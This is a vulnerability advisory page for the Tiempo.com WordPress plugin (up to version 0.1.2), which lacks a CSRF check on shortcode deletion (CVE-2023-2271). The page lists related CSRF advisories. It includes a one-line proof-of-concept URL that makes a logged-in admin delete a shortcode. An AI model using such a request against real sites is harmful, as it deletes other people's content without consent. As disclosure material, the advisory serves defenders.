WordPress Plugin Vulnerabilities

Tiempo.com <= 0.1.2 - Shortcode Deletion via CSRF

Description

The plugin does not have CSRF check when deleting its shortcode, which could allow attackers to make logged in admins delete arbitrary shortcode via a CSRF attack

Proof of Concept

Make a logged in admin open the URL below, this will make them delete the shortcode with ID 1

https://example.com/wp-admin/admin.php?page=tiempocom/app/admin.php&action=delete&shortcode=1

Affects Plugins

Plugin icon
tiempocom
No known fix

References

CVE
CVE-2023-2271

Classification

Type
CSRF
OWASP top 10
A2: Broken Authentication and Session Management
CWE
CWE-352
CVSS
4.3 (medium)

Miscellaneous

Original Researcher
Erwan LR (WPScan)
Verified
Yes
WPVDB ID
31512f33-c310-4b36-b665-19293097cc8b

Timeline

Publicly Published
2023-04-25 (about 1 years ago)
Added
2023-04-25 (about 1 years ago)
Last Updated
2023-04-25 (about 1 years ago)

Other

Published
Title
Published
2018-11-22
Title
Ultimate Member < 2.0.33 - Cross-Site Request Forgery (CSRF)
Published
2023-10-09
Title
EventPrime < 3.2.0 - Booking Creation via CSRF
Published
2021-08-16
Title
Multiple Plugins - CSRF Bypass
Published
2023-02-28
Title
Smart YouTube PRO <= 4.3 - Cross-Site Request Forgery
Published
2023-05-24
Title
Booking Ultra Pro < 1.1.7 - Cross-Site Request Forgery